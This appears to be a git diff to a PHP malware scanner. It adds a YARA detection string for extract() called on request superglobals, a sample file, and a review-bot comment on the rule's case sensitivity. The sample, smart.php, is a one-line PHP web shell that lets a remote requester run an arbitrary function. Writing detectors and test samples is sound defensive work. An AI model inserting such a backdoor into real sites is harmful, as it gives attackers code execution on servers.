-rw-r--r--php-malware-finder/php.yar1
-rw-r--r--php-malware-finder/samples/undetected/smart.php2
2 files changed, 3 insertions, 0 deletions
diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar
index 9b7cf2d..7cb0cf1 100644
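--- a/php-malware-finder/php.yar
+++ b/php-malware-finder/php.yar
@@ -98,6 +98,7 @@ rule DodgyPhp
 $various = "<!--#exec cmd=" //http://www.w3.org/Jigsaw/Doc/User/SSI.html#exec
 $at_eval = /@eval\s*\(/ nocase
 $double_var = /\${\s*\${/
+$extract = /extract\s*\(\s*\$_(GET|POST|REQUEST|COOKIE|SERVER)/
 
 condition:
 (any of them) and not IsWhitelisted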
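Review bot: The new `$extract` string has no `nocase` modifier, unlike `$at_eval` directly above it, and PHP resolves function names case-insensitively, so the rule would miss the same call written in a different case. Consider `$extract = /extract\s*\(\s*\$_(GET|POST|REQUEST|COOKIE|SERVER)/ nocase`; the modifier also relaxes the superglobal names, which PHP treats case-sensitively, but that only widens the match slightly. A short trailing comment saying why the call is flagged (request keys become local variables) would match the style of the `$various` line. The rule DodgyPhp starts and ends outside this hunk, so how `IsWhitelisted` interacts with the new string is not visible here.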
diff --git a/php-malware-finder/samples/undetected/smart.php b/php-malware-finder/samples/undetected/smart.php
new file mode 100644
index 0000000..f358562
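--- /dev/null
+++ b/php-malware-finder/samples/undetected/smart.php
@@ -0,0 +1,2 @@
+<?php extract($_REQUEST); @die($ctime($atime));
+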